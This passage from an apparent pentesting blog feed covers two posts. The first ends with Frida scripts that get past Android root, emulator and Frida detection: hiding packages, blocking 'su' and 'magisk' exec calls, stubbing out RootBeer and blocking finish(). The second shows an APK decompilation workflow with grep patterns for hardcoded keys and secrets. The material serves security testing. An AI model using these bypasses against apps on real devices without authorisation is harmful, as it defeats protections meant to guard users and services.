class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">com.koushikdutta.superuser</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">com.noshufou.android.su</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">com.thirdparty.superuser</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">com.yellowes.su</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">com.zachspong.temprootremovejb</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">com.ramdroid.appquarantine</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">de.robv.android.xposed.installer</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">com.saurik.substrate</span><span class="dl">"</span> <span class="p">];</span> <span class="nx">PM</span><span class="p">.</span><span class="nx">getPackageInfo</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.lang.String</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">int</span><span class="dl">"</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">pkg</span><span class="p">,</span> <span class="nx">flags</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">hiddenPkgs</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="nx">pkg</span><span class="p">)</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Hiding package: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">pkg</span><span class="p">);</span> <span class="k">throw</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.content.pm.PackageManager$NameNotFoundException</span><span class="dl">"</span><span class="p">).</span><span class="nf">$new</span><span class="p">(</span><span class="nx">pkg</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">getPackageInfo</span><span class="p">(</span><span class="nx">pkg</span><span class="p">,</span> <span class="nx">flags</span><span class="p">);</span> <span class="p">};</span> <span class="c1">// ===== Runtime.exec bypass =====</span> <span class="kd">var</span> <span class="nx">Runtime</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.lang.Runtime</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">blockedCmds</span> <span class="o">=</span> <span class="p">[</span><span class="dl">"</span><span class="s2">su</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">which su</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">busybox</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">magisk</span><span class="dl">"</span><span class="p">];</span> <span class="nx">Runtime</span><span class="p">.</span><span class="nx">exec</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.lang.String</span><span class="dl">"</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">cmd</span><span class="p">)</span> <span class="p">{</span> <span class="k">for </span><span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">blockedCmds</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">cmd</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="nx">blockedCmds</span><span class="p">[</span><span class="nx">i</span><span class="p">])</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Blocked exec: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">cmd</span><span class="p">);</span> <span class="k">throw</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.io.IOException</span><span class="dl">"</span><span class="p">).</span><span class="nf">$new</span><span class="p">(</span><span class="dl">"</span><span class="s2">Permission denied</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">exec</span><span class="p">(</span><span class="nx">cmd</span><span class="p">);</span> <span class="p">};</span> <span class="c1">// ===== System.getProperty bypass =====</span> <span class="kd">var</span> <span class="nx">System</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.lang.System</span><span class="dl">"</span><span class="p">);</span> <span class="nx">System</span><span class="p">.</span><span class="nx">getProperty</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.lang.String</span><span class="dl">"</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">key</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">key</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">ro.debuggable</span><span class="dl">"</span> <span class="o">||</span> <span class="nx">key</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">ro.secure</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Spoofed property: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">key</span><span class="p">);</span> <span class="k">return</span> <span class="nx">key</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">ro.secure</span><span class="dl">"</span> <span class="p">?</span> <span class="dl">"</span><span class="s2">1</span><span class="dl">"</span> <span class="p">:</span> <span class="dl">"</span><span class="s2">0</span><span class="dl">"</span><span class="p">;</span> <span class="p">}</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">getProperty</span><span class="p">(</span><span class="nx">key</span><span class="p">);</span> <span class="p">};</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] All bypasses active</span><span class="dl">"</span><span class="p">);</span> <span class="p">});</span> </code></pre></div></div> <p>Run it:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>frida <span class="nt">-U</span> <span class="nt">-f</span> com.target.app <span class="nt">-l</span> bypass-detection.js <span class="nt">--no-pause</span> </code></pre></div></div> <h2 id="dealing-with-commercial-frameworks">Dealing with Commercial Frameworks</h2> <p>When you run into apps that use commercial protection SDKs, the generic bypass above might not cut it. Here’s what to look for.</p> <h3 id="rootbeer">RootBeer</h3> <p>Popular open-source root detection library. Easy to spot because the package name is <code class="language-plaintext highlighter-rouge">com.scottyab.rootbeer</code>.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">RootBeer</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.scottyab.rootbeer.RootBeer</span><span class="dl">"</span><span class="p">);</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">isRooted</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">isRootedWithBusyBoxCheck</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">detectRootManagementApps</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">detectPotentiallyDangerousApps</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">detectTestKeys</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">checkForBusyBoxBinary</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">checkForSuBinary</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">checkSuExists</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">checkForRWPaths</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">checkForDangerousProps</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">checkForRootNative</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">detectRootCloakingApps</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">isSelinuxFlagInEnabled</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">RootBeer</span><span class="p">.</span><span class="nx">checkForMagiskBinary</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] RootBeer fully bypassed</span><span class="dl">"</span><span class="p">);</span> <span class="p">});</span> </code></pre></div></div> <h3 id="proguardr8-obfuscated-detection">ProGuard/R8 Obfuscated Detection</h3> <p>When root detection is obfuscated, you won’t find obvious class names. The approach changes:</p> <ol> <li> <p><strong>Search for string constants</strong> — Decompile with jadx and grep for <code class="language-plaintext highlighter-rouge">"/system/xbin/su"</code> or <code class="language-plaintext highlighter-rouge">"test-keys"</code>. Even with obfuscated method names, the strings are usually still there.</p> </li> <li> <p><strong>Trace File.exists</strong> — Run the comprehensive File.exists hook and watch what paths get checked at startup. The detection code will reveal itself.</p> </li> <li> <p><strong>Hook at the decision point</strong> — Find where the app shows the “rooted device detected” dialog or calls <code class="language-plaintext highlighter-rouge">finish()</code>. Hook that and prevent it.</p> </li> </ol> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Find the kill switch</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">Activity</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.app.Activity</span><span class="dl">"</span><span class="p">);</span> <span class="nx">Activity</span><span class="p">.</span><span class="nx">finish</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[!] finish() blocked on: </span><span class="dl">"</span> <span class="o">+</span> <span class="k">this</span><span class="p">.</span><span class="nf">getClass</span><span class="p">().</span><span class="nf">getName</span><span class="p">());</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.util.Log</span><span class="dl">"</span><span class="p">).</span><span class="nf">getStackTraceString</span><span class="p">(</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.lang.Exception</span><span class="dl">"</span><span class="p">).</span><span class="nf">$new</span><span class="p">()</span> <span class="p">));</span> <span class="c1">// Don't call finish - keep the app alive</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <p>The stack trace will show you exactly which class triggered the kill, even if it’s obfuscated.</p> <h3 id="frida-detection">Frida Detection</h3> <p>Some apps detect Frida itself. Common methods:</p> <ul> <li>Scanning <code class="language-plaintext highlighter-rouge">/proc/self/maps</code> for frida libraries</li> <li>Checking for frida-server on default port (27042)</li> <li>Looking for frida-agent in memory</li> <li>Checking for the frida thread name</li> </ul> <p>Bypass Frida detection:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Hide frida from /proc/self/maps</span> <span class="kd">var</span> <span class="nx">openPtr</span> <span class="o">=</span> <span class="nx">Module</span><span class="p">.</span><span class="nf">findExportByName</span><span class="p">(</span><span class="dl">"</span><span class="s2">libc.so</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">open</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">readPtr</span> <span class="o">=</span> <span class="nx">Module</span><span class="p">.</span><span class="nf">findExportByName</span><span class="p">(</span><span class="dl">"</span><span class="s2">libc.so</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">read</span><span class="dl">"</span><span class="p">);</span> <span class="nx">Interceptor</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="nx">openPtr</span><span class="p">,</span> <span class="p">{</span> <span class="na">onEnter</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">args</span><span class="p">)</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">path</span> <span class="o">=</span> <span class="nx">Memory</span><span class="p">.</span><span class="nf">readUtf8String</span><span class="p">(</span><span class="nx">args</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="k">this</span><span class="p">.</span><span class="nx">isMaps</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">path</span> <span class="o">&amp;&amp;</span> <span class="k">this</span><span class="p">.</span><span class="nx">path</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">/proc/</span><span class="dl">"</span><span class="p">)</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span> <span class="o">&amp;&amp;</span> <span class="k">this</span><span class="p">.</span><span class="nx">path</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">/maps</span><span class="dl">"</span><span class="p">)</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span> <span class="p">},</span> <span class="na">onLeave</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">retval</span><span class="p">)</span> <span class="p">{}</span> <span class="p">});</span> <span class="c1">// Change frida-server default port</span> <span class="c1">// Start frida-server on a non-default port:</span> <span class="c1">// ./frida-server -l 0.0.0.0:1337</span> <span class="c1">// Then connect: frida -H 127.0.0.1:1337 -f com.target.app</span> </code></pre></div></div> <p>For stubborn anti-Frida checks, start frida-server with a renamed binary:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># On the device</span> <span class="nb">cp </span>frida-server /data/local/tmp/myserver <span class="nb">chmod </span>755 /data/local/tmp/myserver /data/local/tmp/myserver &amp; </code></pre></div></div> <h2 id="magiskhide-and-shamiko">MagiskHide and Shamiko</h2> <p>If you’re on a real rooted device (not an emulator), Magisk’s built-in hide features handle a lot of this automatically.</p> <p><strong>Zygisk + DenyList</strong> (Magisk 24+):</p> <ol> <li>Enable Zygisk in Magisk settings</li> <li>Configure the DenyList with the target app</li> <li>The app won’t see root</li> </ol> <p><strong>Shamiko</strong> (Magisk module):</p> <ul> <li>Mounts over root-indicating files</li> <li>Hides Magisk itself from detection</li> <li>Works alongside Zygisk DenyList</li> </ul> <p>For most assessments I use Magisk + Shamiko as the baseline and layer Frida hooks on top for anything that gets through.</p> <h2 id="practical-workflow">Practical Workflow</h2> <p>Here’s how I approach root/emulator detection on a real engagement:</p> <ol> <li> <p><strong>Install the app and launch it</strong> — See what happens. Does it crash? Show a warning? Silently degrade?</p> </li> <li> <p><strong>Decompile and search</strong> — <code class="language-plaintext highlighter-rouge">grep -r "isRooted\|rootbeer\|safetynet\|isEmulator" jadx-output/</code> to find the detection logic.</p> </li> <li> <p><strong>Try the generic bypass script</strong> — Run <code class="language-plaintext highlighter-rouge">bypass-detection.js</code>. This handles ~70% of apps.</p> </li> <li> <p><strong>If that fails, trace the APIs</strong> — Hook <code class="language-plaintext highlighter-rouge">File.exists</code>, <code class="language-plaintext highlighter-rouge">Runtime.exec</code>, <code class="language-plaintext highlighter-rouge">PackageManager.getPackageInfo</code> and log everything at startup. You’ll see exactly what the app checks.</p> </li> <li> <p><strong>Hook the decision point</strong> — Find where the app acts on the detection result and neutralize it there.</p> </li> <li> <p><strong>For SafetyNet/Play Integrity</strong> — Use a real rooted device with Magisk + Shamiko. Emulators can’t pass hardware attestation.</p> </li> </ol> <p>Most apps fall to step 3 or 4. The rest require targeted hooking but the techniques above give you everything you need to find the right hooks.</p> <h2 id="related-posts">Related Posts</h2> <ul> <li><a href="/android-pentesting/2025/11/15/frida-method-hooking-android/">Frida Method Hooking</a> — Fundamentals of hooking Java methods</li> <li><a href="/android-pentesting/2025/11/25/frida-native-hooking/">Native Hooking with Frida</a> — For when detection logic is in native code</li> <li><a href="/android-pentesting/2025/12/13/apk-reverse-engineering-workflow/">APK Reverse Engineering</a> — Finding the detection code in the first place</li> <li><a href="/cheatsheets/frida-android/">Frida Cheat Sheet</a> — Quick reference for all the Frida commands</li> </ul> Mon, 23 Feb 2026 20:00:00 +0000 https://www.marginaldeer.com//blog/android-root-emulator-detection-bypass/ https://www.marginaldeer.com//blog/android-root-emulator-detection-bypass/ android frida root-detection pentest mobile blog From APK to Source: Complete Android Reverse Engineering Workflow <p>This post covers my end-to-end workflow for reverse engineering Android applications. When you’re pentesting a mobile app, static analysis of the decompiled source often reveals more than dynamic testing alone — hardcoded API keys, authentication logic, hidden endpoints, and vulnerable code patterns.</p> <p>I covered <a href="/blog/java-decompilation-cfr/">Java decompilation with CFR</a> in a previous post. This is the Android-specific workflow that gets you from an APK file to readable Java source code.</p> <h2 id="the-toolchain">The Toolchain</h2> <p>You’ll need a few tools. Here’s what I use:</p> <ul> <li><strong>apktool</strong> — Decodes APK resources and disassembles DEX to smali</li> <li><strong>dex2jar</strong> — Converts DEX bytecode to Java class files</li> <li><strong>CFR</strong> — Decompiles class files to Java source</li> <li><strong>jadx</strong> — All-in-one alternative (DEX straight to Java)</li> <li><strong>unzip</strong> — APKs are just ZIP files</li> </ul> <p>Install these on Kali/Debian:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt <span class="nb">install </span>apktool dex2jar unzip wget https://www.benf.org/other/cfr/cfr-0.152.jar </code></pre></div></div> <p>For jadx, grab a release from <a href="https://github.com/skylot/jadx/releases">GitHub</a>:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget https://github.com/skylot/jadx/releases/download/v1.4.7/jadx-1.4.7.zip unzip jadx-1.4.7.zip <span class="nt">-d</span> jadx </code></pre></div></div> <h2 id="getting-the-apk">Getting the APK</h2> <p>If you have the app installed on a device or emulator, pull the APK with adb:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Find the package name</span> adb shell pm list packages | <span class="nb">grep</span> <span class="nt">-i</span> appname <span class="c"># Get the APK path</span> adb shell pm path com.example.app <span class="c"># Output: package:/data/app/com.example.app-1/base.apk</span> <span class="c"># Pull it</span> adb pull /data/app/com.example.app-1/base.apk target.apk </code></pre></div></div> <p>For split APKs (common on newer Android versions):</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>adb shell pm path com.example.app <span class="c"># package:/data/app/com.example.app-1/base.apk</span> <span class="c"># package:/data/app/com.example.app-1/split_config.arm64_v8a.apk</span> <span class="c"># package:/data/app/com.example.app-1/split_config.en.apk</span> <span class="c"># Pull all of them</span> adb pull /data/app/com.example.app-1/ ./app_splits/ </code></pre></div></div> <h2 id="understanding-apk-structure">Understanding APK Structure</h2> <p>Before diving in, it helps to understand what’s inside an APK:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>target.apk ├── AndroidManifest.xml &lt;- App config, permissions, components (binary XML) ├── classes.dex &lt;- Compiled Dalvik bytecode ├── classes2.dex &lt;- Additional DEX (multidex apps) ├── resources.arsc &lt;- Compiled resources ├── res/ &lt;- Resource files (layouts, drawables, etc.) ├── assets/ &lt;- Raw assets (often interesting files here) ├── lib/ &lt;- Native libraries (.so files) │ ├── arm64-v8a/ │ ├── armeabi-v7a/ │ └── x86_64/ └── META-INF/ &lt;- Signing info </code></pre></div></div> <p>The code lives in <code class="language-plaintext highlighter-rouge">classes.dex</code>. That’s what we need to decompile.</p> <h2 id="method-1-the-quick-way-jadx">Method 1: The Quick Way (jadx)</h2> <p>If you just want to see the source fast, jadx does everything in one shot:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jadx <span class="nt">-d</span> output_dir target.apk </code></pre></div></div> <p>This produces:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>output_dir/ ├── resources/ │ ├── AndroidManifest.xml &lt;- Decoded, readable XML │ └── res/ &lt;- Decoded resources └── sources/ └── com/ └── example/ └── app/ &lt;- Decompiled Java source </code></pre></div></div> <p>jadx handles DEX-to-Java directly without intermediate steps. The output is usually good enough for analysis. I use this when I need quick results.</p> <p>For a GUI with search and cross-references:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jadx-gui target.apk </code></pre></div></div> <h2 id="method-2-the-detailed-way-apktool--dex2jar--cfr">Method 2: The Detailed Way (apktool + dex2jar + CFR)</h2> <p>Sometimes jadx struggles with obfuscated apps or you need more control over the process. The traditional toolchain gives you more options.</p> <h3 id="step-1-decode-with-apktool">Step 1: Decode with apktool</h3> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apktool d target.apk <span class="nt">-o</span> apktool_output </code></pre></div></div> <p>This gives you:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apktool_output/ ├── AndroidManifest.xml &lt;- Decoded, readable XML ├── apktool.yml &lt;- apktool metadata ├── original/ &lt;- Original META-INF ├── res/ &lt;- Decoded resources ├── smali/ &lt;- Disassembled DEX (smali code) └── smali_classes2/ &lt;- Additional DEX files </code></pre></div></div> <p>The smali output is useful for:</p> <ul> <li>Patching the app (modify smali, rebuild with <code class="language-plaintext highlighter-rouge">apktool b</code>)</li> <li>Understanding obfuscated code flow</li> <li>Finding strings that don’t decompile well</li> </ul> <h3 id="step-2-convert-dex-to-jar">Step 2: Convert DEX to JAR</h3> <p>Extract the DEX files and convert them:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Extract DEX files from APK</span> unzip <span class="nt">-j</span> target.apk <span class="s2">"*.dex"</span> <span class="nt">-d</span> dex_files/ <span class="c"># Convert each DEX to JAR</span> d2j-dex2jar dex_files/classes.dex <span class="nt">-o</span> classes.jar d2j-dex2jar dex_files/classes2.dex <span class="nt">-o</span> classes2.jar </code></pre></div></div> <h3 id="step-3-decompile-with-cfr">Step 3: Decompile with CFR</h3> <p>Now use CFR to get Java source:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>java <span class="nt">-jar</span> cfr-0.152.jar classes.jar <span class="nt">--outputdir</span> ./decompiled java <span class="nt">-jar</span> cfr-0.152.jar classes2.jar <span class="nt">--outputdir</span> ./decompiled </code></pre></div></div> <p>This gives you a clean directory structure matching the package hierarchy.</p> <h2 id="dealing-with-obfuscation">Dealing with Obfuscation</h2> <p>Most production apps use ProGuard or R8 for obfuscation. You’ll see:</p> <ul> <li>Classes renamed to <code class="language-plaintext highlighter-rouge">a.class</code>, <code class="language-plaintext highlighter-rouge">b.class</code>, etc.</li> <li>Methods named <code class="language-plaintext highlighter-rouge">a()</code>, <code class="language-plaintext highlighter-rouge">b()</code>, <code class="language-plaintext highlighter-rouge">c()</code></li> <li>Meaningless package names like <code class="language-plaintext highlighter-rouge">com.a.b.c</code></li> </ul> <p>Here’s how to work with it:</p> <h3 id="1-find-entry-points">1. Find Entry Points</h3> <p>Start with the <code class="language-plaintext highlighter-rouge">AndroidManifest.xml</code>. Activities, Services, and Receivers are listed with their full class names. These are your entry points:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;activity</span> <span class="na">android:name=</span><span class="s">"com.example.app.MainActivity"</span><span class="nt">&gt;</span> <span class="nt">&lt;intent-filter&gt;</span> <span class="nt">&lt;action</span> <span class="na">android:name=</span><span class="s">"android.intent.action.MAIN"</span><span class="nt">/&gt;</span> <span class="nt">&lt;/intent-filter&gt;</span> <span class="nt">&lt;/activity&gt;</span> <span class="nt">&lt;service</span> <span class="na">android:name=</span><span class="s">"com.example.app.sync.SyncService"</span><span class="nt">/&gt;</span> <span class="nt">&lt;receiver</span> <span class="na">android:name=</span><span class="s">"com.example.app.PushReceiver"</span><span class="nt">/&gt;</span> </code></pre></div></div> <p>Even if the code is obfuscated, these class names are preserved.</p> <h3 id="2-search-for-strings">2. Search for Strings</h3> <p>Grep for interesting strings in the decompiled source:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># API endpoints</span> <span class="nb">grep</span> <span class="nt">-r</span> <span class="s2">"https://"</span> decompiled/ | <span class="nb">grep</span> <span class="nt">-v</span> <span class="s2">".png</span><span class="se">\|</span><span class="s2">.jpg"</span> <span class="c"># Hardcoded keys</span> <span class="nb">grep</span> <span class="nt">-rE</span> <span class="s2">"(api[_-]?key|secret|token|password)"</span> decompiled/ <span class="c"># Crypto operations</span> <span class="nb">grep</span> <span class="nt">-rE</span> <span class="s2">"(AES|RSA|DES|encrypt|decrypt)"</span> decompiled/ <span class="c"># SQL queries</span> <span class="nb">grep</span> <span class="nt">-r</span> <span class="s2">"SELECT</span><span class="se">\|</span><span class="s2">INSERT</span><span class="se">\|</span><span class="s2">UPDATE"</span> decompiled/ <span class="c"># SharedPreferences (local storage)</span> <span class="nb">grep</span> <span class="nt">-r</span> <span class="s2">"getSharedPreferences</span><span class="se">\|</span><span class="s2">putString</span><span class="se">\|</span><span class="s2">getString"</span> decompiled/ </code></pre></div></div> <h3 id="3-trace-from-known-code">3. Trace from Known Code</h3> <p>Find unobfuscated library code and trace into the app code. For example, Retrofit API definitions often reveal endpoint structures:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">public</span> <span class="kd">interface</span> <span class="nc">ApiService</span> <span class="o">{</span> <span class="nd">@POST</span><span class="o">(</span><span class="s">"api/v1/login"</span><span class="o">)</span> <span class="nc">Call</span><span class="o">&lt;</span><span class="nc">LoginResponse</span><span class="o">&gt;</span> <span class="nf">login</span><span class="o">(</span><span class="nd">@Body</span> <span class="nc">LoginRequest</span> <span class="n">request</span><span class="o">);</span> <span class="nd">@GET</span><span class="o">(</span><span class="s">"api/v1/user/{id}"</span><span class="o">)</span> <span class="nc">Call</span><span class="o">&lt;</span><span class="nc">User</span><span class="o">&gt;</span> <span class="nf">getUser</span><span class="o">(</span><span class="nd">@Path</span><span class="o">(</span><span class="s">"id"</span><span class="o">)</span> <span class="nc">String</span> <span class="n">userId</span><span class="o">);</span> <span class="o">}</span> </code></pre></div></div> <h2 